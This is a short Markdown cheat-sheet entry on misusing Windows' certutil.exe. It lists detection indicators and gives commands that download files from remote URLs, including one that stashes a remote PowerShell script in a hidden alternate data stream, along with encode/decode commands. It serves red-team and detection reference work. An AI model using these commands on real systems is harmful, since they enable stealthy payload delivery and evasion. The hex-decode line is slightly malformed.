~/Privilege Escalation/Windows/Binaries# cat Certutil.exe.md █
Windows binary used for handeling certificates
Paths:
C:\Windows\System32\certutil.exe
C:\Windows\SysWOW64\certutil.exe
Detection: Certutil.exe creating new files on disk Useragent Microsoft-CryptoAPI/10.0 Useragent CertUtil URL Agent
Download
Download and save 7zip to disk in the current folder.
certutil.exe -urlcache -split -f http://7-zip.org/a/7z1604-x64.exe 7zip.exe
Download and save 7zip to disk in the current folder.
certutil.exe -verifyctl -f -split http://7-zip.org/a/7z1604-x64.exe 7zip.exe
Alternate data streams
Download and save a PS1 file to an Alternate Data Stream (ADS).
certutil.exe -urlcache -split -f https://raw.githubusercontent.com/Moriarty2016/git/master/test.ps1 c:\temp:ttt
Encode
Command to encode a file using Base64
certutil -encode inputFileName encodedOutputFileName
Decode
Command to decode a Base64 encoded file.
certutil -decode encodedInputFileName decodedOutputFileName
Command to decode a hexadecimal-encoded file decodedOutputFileName
certutil --decodehex encoded_hexadecimal_InputFileName